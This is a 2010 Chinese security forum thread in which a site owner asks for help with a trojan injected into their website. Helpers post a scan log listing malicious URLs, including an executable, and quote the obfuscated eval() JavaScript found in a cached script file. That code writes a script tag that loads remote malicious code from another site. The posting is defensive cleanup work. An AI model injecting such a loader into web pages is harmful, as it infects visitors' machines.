网站被挂马，请高手排查下。 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流 瑞星云安全网站联盟专版网站被挂马，请高手排查下。

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十六次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

网站被挂马，请高手排查下。

本主题由版主 networkedition 于 2010-2-3 13:45:53 执行合并主题操作

魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:	发表于： 2010-02-03 12:41 \| 只看楼主短消息资料字号：小中大 1楼网站被挂马，请高手排查下。网页：http://www.3ux.cn/lastpost-12949.html 检测时间：2010-2-3 1:09:390 木马网址： http://game.hsw.cn/skin/css/log.htm shellcode溢出攻击解决方案网页：http://www.3ux.cn/lastpost-12904.html 检测时间：2010-2-2 23:35:52 木马网址： http://game.hsw.cn/skin/css/log.htm shellcode溢出攻击解决方案网页：http://www.3ux.cn/ 检测时间：2010-2-2 21:31:54 木马网址： http://game.hsw.cn/skin/css/log.htm shellcode溢出攻击解决方案网页：http://www.3ux.cn/lastpost-13480.html 检测时间：2010-2-2 20:20:55 木马网址： http://game.hsw.cn/skin/css/log.htm shellcode溢出攻击解决方案网页：http://www.3ux.cn/lastpost-18068.html 检测时间：2010-2-2 19:09:29 木马网址： http://game.hsw.cn/skin/css/log.htm shellcode溢出攻击解决方案不知道如何去解决此类问题。看到有人和我一样的也是这个木马地址用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) networkedition 最后编辑于 2010-02-03 12:48:14
魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-02-03 12:48 \| 短消息资料字号：小中大 2楼回复 1F 魅8网络的帖子是被挂马了 Log is generated by FreShow. [wide]http://www.3ux.cn/lastpost-12949.html [script]http://www.3ux.cn/forumdata/cache/common.js?0sG [object]http://bbs.xcdx169.net/include/log.js?TSEEQITO [frame]http://game.hsw.cn/skin/css/log.htm?人03 [script]http://game.hsw.cn/skin/css/log.js [object]http://game.hsw.cn/skin/img/74.exe [script]http://www.3ux.cn/forumdata/cache/viewthread.js?0sG [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://www.3ux.cn/tag.php?action=relatetag&rtid=12949 [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://busjs.vodone.cn/bus/ownerjs/advjs_94/94186/94186_132484_p22_.js [script]http://s1.cnzz.com/stat.php?id=1236731&web_id=1236731 [script]http://www.3ux.cn/relatekw.php?tid=12949
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:	发表于： 2010-02-03 12:54 \| 只看楼主短消息资料字号：小中大 3楼回复：网站被挂马，请高手排查下。请问该如歌曲解决呢？
魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:

魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:	发表于： 2010-02-03 12:55 \| 只看楼主短消息资料字号：小中大 4楼回复：网站被挂马，请高手排查下。小白问题。。。对这个不是很了解
魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:

魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:	发表于： 2010-02-03 13:15 \| 只看楼主短消息资料字号：小中大 5楼木马查出来了,如何去删除？小白求助 Log is generated by FreShow. [wide]http://www.3ux.cn/lastpost-12949.html [script]http://www.3ux.cn/forumdata/cache/common.js?0sG [object]http://bbs.xcdx169.net/include/log.js?TSEEQITO [frame]http://game.hsw.cn/skin/css/log.htm?人03 [script]http://game.hsw.cn/skin/css/log.js [object]http://game.hsw.cn/skin/img/74.exe [script]http://www.3ux.cn/forumdata/cache/viewthread.js?0sG [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://www.3ux.cn/tag.php?action=relatetag&rtid=12949 [script]http://pagead2.googlesyndication.com/pagead/show_ads.js [script]http://busjs.vodone.cn/bus/ownerjs/advjs_94/94186/94186_132484_p22_.js [script]http://s1.cnzz.com/stat.php?id=1236731&web_id=1236731 [script]http://www.3ux.cn/relatekw.php?tid=12949 用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
魅8网络初生襁褓狮帖子:4 注册: 2010-02-03 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-02-03 13:36 \| 短消息资料字号：小中大 6楼回复 4F 魅8网络的帖子这个链接：http://www.3ux.cn/forumdata/cache/common.js?WIw 源代码中有个eval代码如下： [复制到剪贴板] CODE: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script\|src\|javascript\|language\|document\|writeln\|http\|xcdx169\|js\|IJYZPYKL\|log\|include\|net\|bbs'.split('\|'),0,{}));} 找到将其清除，其它页面类似。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

朱小朱初生襁褓狮帖子:36 注册: 2009-08-18 来自:	发表于： 2010-02-03 13:44 \| 短消息资料字号：小中大 7楼回复：木马查出来了,如何去删除？小白求助你是网站管理员么？找到相应的代码，一般为src之类的镶嵌代码，删除就OK了。如果是本机上的话，是没有办法操作的。如果你已经中毒了，可以扫描一份日志自己分析或者发上来让大家分析。或者提交样本。
朱小朱初生襁褓狮帖子:36 注册: 2009-08-18 来自:

何旭鑫，何旭鑫！强壮不惑狮帖子:967 注册: 2007-06-01 来自:云南省昆明市	发表于： 2010-02-05 19:54 \| 短消息资料字号：小中大 8楼回复：网站被挂马，请高手排查下。删掉即可
何旭鑫，何旭鑫！强壮不惑狮帖子:967 注册: 2007-06-01 来自:云南省昆明市

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT